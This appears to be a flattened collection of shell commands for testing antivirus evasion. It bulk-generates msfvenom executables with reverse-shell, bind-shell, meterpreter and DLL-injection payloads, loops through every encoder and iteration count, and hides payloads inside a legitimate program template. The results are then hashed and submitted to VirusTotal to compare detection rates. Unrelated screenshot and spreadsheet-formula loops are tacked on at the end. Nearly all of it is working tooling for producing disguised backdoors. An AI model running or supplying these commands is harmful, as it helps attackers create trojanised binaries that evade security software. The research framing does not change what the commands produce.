msfvenom -p generic/custom -f exe -e generic/none -a x86 --platform windows -i 1 PAYLOADSTR= > evil.exe msfvenom -p generic/custom -f exe -e generic/none -a x86 --platform windows -i 1 -k PAYLOADSTR= > evil.exe msfvenom -p generic/custom -f exe -e generic/none -a x86 --platform windows -i 1 -x legit.exe PAYLOADSTR= > evil.exe msfvenom -p generic/custom -f exe -e generic/none -a x86 --platform windows -i 1 -x legit.exe -k PAYLOADSTR= > evil.exe msfvenom -l encoders 2>&1 >/dev/null | grep "/" | awk '{print $1}' for x in *.exe ; do md5sum $x ; done for x in output/*.exe ; do md5sum $x ; done | sort python virustotal.py --mode scan --out /tmp/av `ls output/blank-default*` && python virustotal.py --mode report --output report /tmp/av cat report | grep -i API | cut -f1 > /tmp/av && python virustotal.py --mode report --output report /tmp/av echo "generic/shell_bind_tcp generic/shell_reverse_tcp windows/shell/bind_tcp windows/shell_bind_tcp windows/shell/reverse_tcp windows/shell_reverse_tcp windows/meterpreter/bind_tcp windows/meterpreter/reverse_tcp linux/x86/shell/bind_tcp linux/x86/shell_bind_tcp linux/x86/shell/reverse_tcp linux/x86/shell_reverse_tcp linux/x86/shell_reverse_tcp2 linux/x86/meterpreter/bind_tcp linux/x86/meterpreter/reverse_tcp osx/x86/shell_bind_tcp osx/x86/vforkshell/bind_tcp osx/x86/vforkshell_bind_tcp osx/x86/shell_reverse_tcp osx/x86/vforkshell/reverse_tcp osx/x86/vforkshell_reverse_tcp windows/dllinject/reverse_tcp windows/patchupdllinject/reverse_tcp windows/dllinject/bind_tcp windows/patchupdllinject/bind_tcp" > /tmp/payload.txt for y in {normal,*.exe} ; do for x in `msfvenom -l encoders 2>&1 >/dev/null | grep "/" | awk '{print $1}'`; do for i in {1,5,10,25,100}; do if [ "$y" == "normal" ] ; then msfvenom -p generic/custom -f exe -e $x -i $i PAYLOADSTR= > output/generic_-_custom-default~[$(echo $x | sed "s/\//_-_/g")]-$i.exe else msfvenom -p generic/custom -f exe -e $x -i $i -x $y PAYLOADSTR= > output/generic_-_custom-$y~[$(echo $x | sed "s/\//_-_/g")]-$i.exe fi done done done for payload in $(cat /tmp/payload.txt); do for y in {normal,*.exe} ; do for x in `msfvenom -l encoders 2>&1 >/dev/null | grep "/" | awk '{print $1}'`; do for i in {1,5,10,25,100}; do if [ "$y" == "normal" ] ; then msfvenom -p $payload -f exe -e $x -i $i --platform windows LHOST=127.0.0.1 LPORT=4444 RHOST=127.0.0.1 RPORT=5555 > output/$(echo $payload | sed "s/\//_-_/g")-default~[$(echo $x | sed 's/\//_-_/g')]-$i.exe else msfvenom -p $payload -f exe -e $x -i $i --platform windows -x $y LHOST=127.0.0.1 LPORT=4444 RHOST=127.0.0.1 RPORT=5555 > output/$(echo $payload | sed "s/\//_-_/g")-$y~[$(echo $x | sed "s/\//_-_/g")]-$i.exe fi done done done done for y in *.exe ; do python bmmvtu.py --output report-$y output/blank-$y* done for payload in $(cat /tmp/payload.txt); do for y in *.exe ; do python bmmvtu.py --output report-$(echo $payload | sed "s/\//_-_/g")-$y output/$(echo $payload | sed "s/\//_-_/g")-$y* done done for url in `cat /tmp/urls.txt`; do ./CutyCapt --url=$(echo $url | cut -d, -f2) --out=/mnt/win/$(echo $url | cut -d, -f1).png; done for a in G I K M O Q S U W Y AA AC AE AG AI AK AM AO AQ AS AU AW AY BA BC BE BG BI BK BM BO BQ BS BU BW BY CA CC CE CG CI CK CM CO; do for i in {2..137..5}; do echo -en '=IF(RAW!'$a$i'="-","n",IF(ISTEXT(RAW!'$a$i'),"y","n/a")) ' done echo done